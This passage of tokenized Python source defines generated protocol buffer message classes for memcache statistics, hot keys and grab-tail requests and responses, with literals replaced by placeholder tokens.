( <NUM_LIT> ) <EOL> out . putVarUint64 ( self . byte_hits_ ) <EOL> out . putVarInt32 ( <NUM_LIT:32> ) <EOL> out . putVarUint64 ( self . items_ ) <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarUint64 ( self . bytes_ ) <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . put32 ( self . oldest_item_age_ ) <EOL> for i in xrange ( len ( self . hotkeys_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . hotkeys_ [ i ] . ByteSize ( ) ) <EOL> self . hotkeys_ [ i ] . OutputUnchecked ( out ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_hits_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:8> ) <EOL> out . putVarUint64 ( self . hits_ ) <EOL> if ( self . has_misses_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:16> ) <EOL> out . putVarUint64 ( self . misses_ ) <EOL> if ( self . has_byte_hits_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarUint64 ( self . byte_hits_ ) <EOL> if ( self . has_items_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:32> ) <EOL> out . putVarUint64 ( self . items_ ) <EOL> if ( self . has_bytes_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarUint64 ( self . bytes_ ) <EOL> if ( self . has_oldest_item_age_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . put32 ( self . oldest_item_age_ ) <EOL> for i in xrange ( len ( self . hotkeys_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . hotkeys_ [ i ] . ByteSizePartial ( ) ) <EOL> self . hotkeys_ [ i ] . OutputPartial ( out ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:8> : <EOL> self . set_hits ( d . getVarUint64 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT:16> : <EOL> self . set_misses ( d . getVarUint64 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_byte_hits ( d . getVarUint64 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT:32> : <EOL> self . set_items ( d . getVarUint64 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_bytes ( d . getVarUint64 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_oldest_item_age ( d . get32 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> length = d . getVarInt32 ( ) <EOL> tmp = ProtocolBuffer . Decoder ( d . buffer ( ) , d . pos ( ) , d . pos ( ) + length ) <EOL> d . skip ( length ) <EOL> self . add_hotkeys ( ) . TryMerge ( tmp ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_hits_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt64 ( self . hits_ ) ) <EOL> if self . has_misses_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt64 ( self . misses_ ) ) <EOL> if self . has_byte_hits_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt64 ( self . byte_hits_ ) ) <EOL> if self . has_items_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt64 ( self . items_ ) ) <EOL> if self . has_bytes_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt64 ( self . bytes_ ) ) <EOL> if self . has_oldest_item_age_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatFixed32 ( self . oldest_item_age_ ) ) <EOL> cnt = <NUM_LIT:0> <EOL> for e in self . hotkeys_ : <EOL> elm = "<STR_LIT>" <EOL> if printElemNumber : elm = "<STR_LIT>" % cnt <EOL> res += prefix + ( "<STR_LIT>" % elm ) <EOL> res += e . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> cnt += <NUM_LIT:1> <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> khits = <NUM_LIT:1> <EOL> kmisses = <NUM_LIT:2> <EOL> kbyte_hits = <NUM_LIT:3> <EOL> kitems = <NUM_LIT:4> <EOL> kbytes = <NUM_LIT:5> <EOL> koldest_item_age = <NUM_LIT:6> <EOL> khotkeys = <NUM_LIT:7> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> <NUM_LIT:4> : "<STR_LIT>" , <EOL> <NUM_LIT:5> : "<STR_LIT>" , <EOL> <NUM_LIT:6> : "<STR_LIT>" , <EOL> <NUM_LIT:7> : "<STR_LIT>" , <EOL> } , <NUM_LIT:7> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:3> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:4> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:5> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:6> : ProtocolBuffer . Encoder . FLOAT , <EOL> <NUM_LIT:7> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:7> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class MemcacheHotKey ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_key_ = <NUM_LIT:0> <EOL> key_ = "<STR_LIT>" <EOL> has_qps_ = <NUM_LIT:0> <EOL> qps_ = <NUM_LIT:0.0> <EOL> has_name_space_ = <NUM_LIT:0> <EOL> name_space_ = "<STR_LIT>" <EOL> def __init__ ( self , contents = None ) : <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def key ( self ) : return self . key_ <EOL> def set_key ( self , x ) : <EOL> self . has_key_ = <NUM_LIT:1> <EOL> self . key_ = x <EOL> def clear_key ( self ) : <EOL> if self . has_key_ : <EOL> self . has_key_ = <NUM_LIT:0> <EOL> self . key_ = "<STR_LIT>" <EOL> def has_key ( self ) : return self . has_key_ <EOL> def qps ( self ) : return self . qps_ <EOL> def set_qps ( self , x ) : <EOL> self . has_qps_ = <NUM_LIT:1> <EOL> self . qps_ = x <EOL> def clear_qps ( self ) : <EOL> if self . has_qps_ : <EOL> self . has_qps_ = <NUM_LIT:0> <EOL> self . qps_ = <NUM_LIT:0.0> <EOL> def has_qps ( self ) : return self . has_qps_ <EOL> def name_space ( self ) : return self . name_space_ <EOL> def set_name_space ( self , x ) : <EOL> self . has_name_space_ = <NUM_LIT:1> <EOL> self . name_space_ = x <EOL> def clear_name_space ( self ) : <EOL> if self . has_name_space_ : <EOL> self . has_name_space_ = <NUM_LIT:0> <EOL> self . name_space_ = "<STR_LIT>" <EOL> def has_name_space ( self ) : return self . has_name_space_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_key ( ) ) : self . set_key ( x . key ( ) ) <EOL> if ( x . has_qps ( ) ) : self . set_qps ( x . qps ( ) ) <EOL> if ( x . has_name_space ( ) ) : self . set_name_space ( x . name_space ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_key_ != x . has_key_ : return <NUM_LIT:0> <EOL> if self . has_key_ and self . key_ != x . key_ : return <NUM_LIT:0> <EOL> if self . has_qps_ != x . has_qps_ : return <NUM_LIT:0> <EOL> if self . has_qps_ and self . qps_ != x . qps_ : return <NUM_LIT:0> <EOL> if self . has_name_space_ != x . has_name_space_ : return <NUM_LIT:0> <EOL> if self . has_name_space_ and self . name_space_ != x . name_space_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( not self . has_key_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> if ( not self . has_qps_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += self . lengthString ( len ( self . key_ ) ) <EOL> if ( self . has_name_space_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . name_space_ ) ) <EOL> return n + <NUM_LIT:10> <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_key_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthString ( len ( self . key_ ) ) <EOL> if ( self . has_qps_ ) : <EOL> n += <NUM_LIT:9> <EOL> if ( self . has_name_space_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . name_space_ ) ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_key ( ) <EOL> self . clear_qps ( ) <EOL> self . clear_name_space ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . key_ ) <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putDouble ( self . qps_ ) <EOL> if ( self . has_name_space_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . name_space_ ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_key_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . key_ ) <EOL> if ( self . has_qps_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putDouble ( self . qps_ ) <EOL> if ( self . has_name_space_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . name_space_ ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:10> : <EOL> self . set_key ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_qps ( d . getDouble ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_name_space ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_key_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . key_ ) ) <EOL> if self . has_qps_ : res += prefix + ( "<STR_LIT>" % self . DebugFormat ( self . qps_ ) ) <EOL> if self . has_name_space_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . name_space_ ) ) <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> kkey = <NUM_LIT:1> <EOL> kqps = <NUM_LIT:2> <EOL> kname_space = <NUM_LIT:3> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT:key>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> } , <NUM_LIT:3> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . DOUBLE , <EOL> <NUM_LIT:3> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:3> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class MemcacheStatsResponse ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_stats_ = <NUM_LIT:0> <EOL> stats_ = None <EOL> def __init__ ( self , contents = None ) : <EOL> self . lazy_init_lock_ = thread . allocate_lock ( ) <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def stats ( self ) : <EOL> if self . stats_ is None : <EOL> self . lazy_init_lock_ . acquire ( ) <EOL> try : <EOL> if self . stats_ is None : self . stats_ = MergedNamespaceStats ( ) <EOL> finally : <EOL> self . lazy_init_lock_ . release ( ) <EOL> return self . stats_ <EOL> def mutable_stats ( self ) : self . has_stats_ = <NUM_LIT:1> ; return self . stats ( ) <EOL> def clear_stats ( self ) : <EOL> if self . has_stats_ : <EOL> self . has_stats_ = <NUM_LIT:0> ; <EOL> if self . stats_ is not None : self . stats_ . Clear ( ) <EOL> def has_stats ( self ) : return self . has_stats_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_stats ( ) ) : self . mutable_stats ( ) . MergeFrom ( x . stats ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_stats_ != x . has_stats_ : return <NUM_LIT:0> <EOL> if self . has_stats_ and self . stats_ != x . stats_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( self . has_stats_ and not self . stats_ . IsInitialized ( debug_strs ) ) : initialized = <NUM_LIT:0> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_stats_ ) : n += <NUM_LIT:1> + self . lengthString ( self . stats_ . ByteSize ( ) ) <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_stats_ ) : n += <NUM_LIT:1> + self . lengthString ( self . stats_ . ByteSizePartial ( ) ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_stats ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> if ( self . has_stats_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putVarInt32 ( self . stats_ . ByteSize ( ) ) <EOL> self . stats_ . OutputUnchecked ( out ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_stats_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putVarInt32 ( self . stats_ . ByteSizePartial ( ) ) <EOL> self . stats_ . OutputPartial ( out ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:10> : <EOL> length = d . getVarInt32 ( ) <EOL> tmp = ProtocolBuffer . Decoder ( d . buffer ( ) , d . pos ( ) , d . pos ( ) + length ) <EOL> d . skip ( length ) <EOL> self . mutable_stats ( ) . TryMerge ( tmp ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_stats_ : <EOL> res += prefix + "<STR_LIT>" <EOL> res += self . stats_ . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> kstats = <NUM_LIT:1> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> } , <NUM_LIT:1> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:1> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class MemcacheGrabTailRequest ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_item_count_ = <NUM_LIT:0> <EOL> item_count_ = <NUM_LIT:0> <EOL> has_name_space_ = <NUM_LIT:0> <EOL> name_space_ = "<STR_LIT>" <EOL> has_override_ = <NUM_LIT:0> <EOL> override_ = None <EOL> def __init__ ( self , contents = None ) : <EOL> self . lazy_init_lock_ = thread . allocate_lock ( ) <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def item_count ( self ) : return self . item_count_ <EOL> def set_item_count ( self , x ) : <EOL> self . has_item_count_ = <NUM_LIT:1> <EOL> self . item_count_ = x <EOL> def clear_item_count ( self ) : <EOL> if self . has_item_count_ : <EOL> self . has_item_count_ = <NUM_LIT:0> <EOL> self . item_count_ = <NUM_LIT:0> <EOL> def has_item_count ( self ) : return self . has_item_count_ <EOL> def name_space ( self ) : return self . name_space_ <EOL> def set_name_space ( self , x ) : <EOL> self . has_name_space_ = <NUM_LIT:1> <EOL> self . name_space_ = x <EOL> def clear_name_space ( self ) : <EOL> if self . has_name_space_ : <EOL> self . has_name_space_ = <NUM_LIT:0> <EOL> self . name_space_ = "<STR_LIT>" <EOL> def has_name_space ( self ) : return self . has_name_space_ <EOL> def override ( self ) : <EOL> if self . override_ is None : <EOL> self . lazy_init_lock_ . acquire ( ) <EOL> try : <EOL> if self . override_ is None : self . override_ = AppOverride ( ) <EOL> finally : <EOL> self . lazy_init_lock_ . release ( ) <EOL> return self . override_ <EOL> def mutable_override ( self ) : self . has_override_ = <NUM_LIT:1> ; return self . override ( ) <EOL> def clear_override ( self ) : <EOL> if self . has_override_ : <EOL> self . has_override_ = <NUM_LIT:0> ; <EOL> if self . override_ is not None : self . override_ . Clear ( ) <EOL> def has_override ( self ) : return self . has_override_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_item_count ( ) ) : self . set_item_count ( x . item_count ( ) ) <EOL> if ( x . has_name_space ( ) ) : self . set_name_space ( x . name_space ( ) ) <EOL> if ( x . has_override ( ) ) : self . mutable_override ( ) . MergeFrom ( x . override ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_item_count_ != x . has_item_count_ : return <NUM_LIT:0> <EOL> if self . has_item_count_ and self . item_count_ != x . item_count_ : return <NUM_LIT:0> <EOL> if self . has_name_space_ != x . has_name_space_ : return <NUM_LIT:0> <EOL> if self . has_name_space_ and self . name_space_ != x . name_space_ : return <NUM_LIT:0> <EOL> if self . has_override_ != x . has_override_ : return <NUM_LIT:0> <EOL> if self . has_override_ and self . override_ != x . override_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( not self . has_item_count_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> if ( self . has_override_ and not self . override_ . IsInitialized ( debug_strs ) ) : initialized = <NUM_LIT:0> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += self . lengthVarInt64 ( self . item_count_ ) <EOL> if ( self . has_name_space_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . name_space_ ) ) <EOL> if ( self . has_override_ ) : n += <NUM_LIT:1> + self . lengthString ( self . override_ . ByteSize ( ) ) <EOL> return n + <NUM_LIT:1> <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_item_count_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthVarInt64 ( self . item_count_ ) <EOL> if ( self . has_name_space_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . name_space_ ) ) <EOL> if ( self . has_override_ ) : n += <NUM_LIT:1> + self . lengthString ( self . override_ . ByteSizePartial ( ) ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_item_count ( ) <EOL> self . clear_name_space ( ) <EOL> self . clear_override ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> out . putVarInt32 ( <NUM_LIT:8> ) <EOL> out . putVarInt32 ( self . item_count_ ) <EOL> if ( self . has_name_space_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . name_space_ ) <EOL> if ( self . has_override_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . override_ . ByteSize ( ) ) <EOL> self . override_ . OutputUnchecked ( out ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_item_count_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:8> ) <EOL> out . putVarInt32 ( self . item_count_ ) <EOL> if ( self . has_name_space_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . name_space_ ) <EOL> if ( self . has_override_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . override_ . ByteSizePartial ( ) ) <EOL> self . override_ . OutputPartial ( out ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:8> : <EOL> self . set_item_count ( d . getVarInt32 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_name_space ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> length = d . getVarInt32 ( ) <EOL> tmp = ProtocolBuffer . Decoder ( d . buffer ( ) , d . pos ( ) , d . pos ( ) + length ) <EOL> d . skip ( length ) <EOL> self . mutable_override ( ) . TryMerge ( tmp ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_item_count_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt32 ( self . item_count_ ) ) <EOL> if self . has_name_space_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . name_space_ ) ) <EOL> if self . has_override_ : <EOL> res += prefix + "<STR_LIT>" <EOL> res += self . override_ . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> kitem_count = <NUM_LIT:1> <EOL> kname_space = <NUM_LIT:2> <EOL> koverride = <NUM_LIT:3> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> } , <NUM_LIT:3> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:3> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:3> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class MemcacheGrabTailResponse_Item ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_value_ = <NUM_LIT:0> <EOL> value_ = "<STR_LIT>" <EOL> has_flags_ = <NUM_LIT:0> <EOL> flags_ = <NUM_LIT:0> <EOL> def __init__ ( self , contents = None ) : <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def value ( self ) : return self . value_ <EOL> def set_value ( self , x ) : <EOL> self . has_value_ = <NUM_LIT:1> <EOL> self . value_ = x <EOL> def clear_value ( self ) : <EOL> if self . has_value_ : <EOL> self . has_value_ = <NUM_LIT:0> <EOL> self . value_ = "<STR_LIT>" <EOL> def has_value ( self ) : return self . has_value_ <EOL> def flags ( self ) : return self . flags_ <EOL> def set_flags ( self , x ) : <EOL> self . has_flags_ = <NUM_LIT:1> <EOL> self . flags_ = x <EOL> def clear_flags ( self ) : <EOL> if self . has_flags_ : <EOL> self . has_flags_ = <NUM_LIT:0> <EOL> self . flags_ = <NUM_LIT:0> <EOL> def has_flags ( self ) : return self . has_flags_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_value ( ) ) : self . set_value ( x . value ( ) ) <EOL> if ( x . has_flags ( ) ) : self . set_flags ( x . flags ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_value_ != x . has_value_ : return <NUM_LIT:0> <EOL> if self . has_value_ and self . value_ != x . value_ : return <NUM_LIT:0> <EOL> if self . has_flags_ != x . has_flags_ : return <NUM_LIT:0> <EOL> if self . has_flags_ and self . flags_ != x . flags_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( not self . has_value_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += self . lengthString ( len ( self . value_ ) ) <EOL> if ( self . has_flags_ ) : n += <NUM_LIT:5> <EOL> return n + <NUM_LIT:1> <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_value_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthString ( len ( self . value_ ) ) <EOL> if ( self . has_flags_ ) : n += <NUM_LIT:5> <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_value ( ) <EOL> self . clear_flags ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . value_ ) <EOL> if ( self . has_flags_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . put32 ( self . flags_ ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_value_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . value_ ) <EOL> if ( self . has_flags_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . put32 ( self . flags_ ) <EOL> def TryMerge ( self , d ) : <EOL> while <NUM_LIT:1> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:12> : break <EOL> if tt == <NUM_LIT> : <EOL> self . set_value ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_flags ( d . get32 ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_value_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . value_ ) ) <EOL> if self . has_flags_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatFixed32 ( self . flags_ ) ) <EOL> return res <EOL> class MemcacheGrabTailResponse ( ProtocolBuffer . ProtocolMessage ) : <EOL> def __init__ ( self , contents = None ) : <EOL> self . item_ = [ ] <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def item_size ( self ) : return len ( self . item_ ) <EOL> def item_list ( self ) : return self . item_ <EOL> def item ( self , i ) : <EOL> return self . item_ [ i ] <EOL> def mutable_item ( self , i ) : <EOL> return self . item_ [ i ] <EOL> def add_item ( self ) : <EOL> x = MemcacheGrabTailResponse_Item ( ) <EOL> self . item_ . append ( x ) <EOL> return x <EOL> def clear_item ( self ) : <EOL> self . item_ = [ ] <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> for i in xrange ( x . item_size 